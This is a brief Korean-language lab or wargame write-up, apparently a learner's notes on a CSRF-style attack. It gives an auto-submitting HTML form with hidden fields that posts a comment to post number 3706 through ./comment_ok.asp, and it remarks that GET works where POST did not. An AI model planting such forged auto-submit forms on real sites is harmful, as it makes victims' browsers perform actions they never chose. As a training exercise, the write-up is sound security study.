1) Q1 과 동일하게 진행

(action, parameter 추출 후 HTML 코드 작성)

단, 댓글의 경우 작성될 게시글의 num 값을 지정해줘야한다

Q1에서 작성했던 success의 num, page 값인 3706, 1 을 지정해서 작성하면 해당 게시글에 댓글 달기 가능

<form name="frmMent" action="./comment_ok.asp">
<input type="hidden" name="num" value="3706">
<input type="hidden" name="page" value="1">
<input type="hidden" name="co_content" value="abc">
<input type="hidden" name="co_name" value="1">
<input type="hidden" name="co_pass" value="1">
</form>
<script>document.frmMent.submit();</script>

이해 안 되는 부분, post로 보내면 안 되고 이렇게 태그를 잘라서 get으로 쏘면 정상 작동

2) 게시글 작성

3) 공격 확인